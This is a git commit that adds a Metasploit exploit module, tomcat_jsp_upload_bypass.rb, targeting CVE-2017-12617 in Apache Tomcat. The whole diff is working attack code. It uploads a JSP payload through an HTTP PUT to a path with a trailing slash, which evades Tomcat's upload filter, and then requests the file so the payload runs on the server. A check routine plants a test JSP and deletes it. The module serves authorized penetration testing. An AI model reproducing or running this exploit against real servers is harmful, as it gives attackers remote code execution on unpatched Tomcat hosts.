Create tomcat_jsp_upload_bypass.rb

Created a module for CVE-2017-12617 which uploads a jsp payload and executes it.
2017-10-08 21:48:47 -04:00 · 2017-10-08 21:48:47 -04:00 · be8680ba3d
parent 015e30c4f3
commit be8680ba3d
1 changed files with 114 additions and 0 deletions
--- a/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
+++ b/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
+      'Description'    => %q{
+        This module uploads a jsp payload and executes it.
+      },
+      'Author'      => 'peewpw',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-12617' ],
+          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
+          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
+        ],
+      'Privileged'     => false,
+      'Platform'    => %w{ linux win }, # others?
+      'Targets'     =>
+        [
+          [ 'Automatic',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Java Windows',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Java Linux',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Oct 03 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
+        Opt::RPORT(8080)
+      ], self.class)
+  end
+
+  def check
+    testurl = Rex::Text::rand_text_alpha(10)
+    testcontent = Rex::Text::rand_text_alpha(10)
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+      'method'    => 'PUT',
+      'data'      => "<% out.println(\"#{testcontent}\");%>"
+    })
+    
+    res1 = send_request_cgi({
+      'uri'       => normalize_uri(target_uri,"#{testurl}.jsp"),
+      'method'    => 'GET'
+    })
+
+    if res1 and res1.body.include?(testcontent)
+      res1 = send_request_cgi({
+        'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+        'method'    => 'DELETE',
+        'timeout'   => 1
+      })
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    print_status("Uploading payload...")
+    testurl = Rex::Text::rand_text_alpha(10)
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+      'method'    => 'PUT',
+      'data'      => "#{payload.encoded}"
+    })
+    if res and res.code == 201
+      res1 = send_request_cgi({
+        'uri'       => normalize_uri(target_uri,"#{testurl}.jsp"),
+        'method'    => 'GET'
+      })
+      if res1 and res1.code == 200
+        print_status("Payload executed!")
+      else
+        fail_with(Failure::Unknown, "Failed to execute the payload")
+      end
+    else
+      fail_with(Failure::Unknown, "Failed to upload the payload")
+    end
+
+  end
+end
+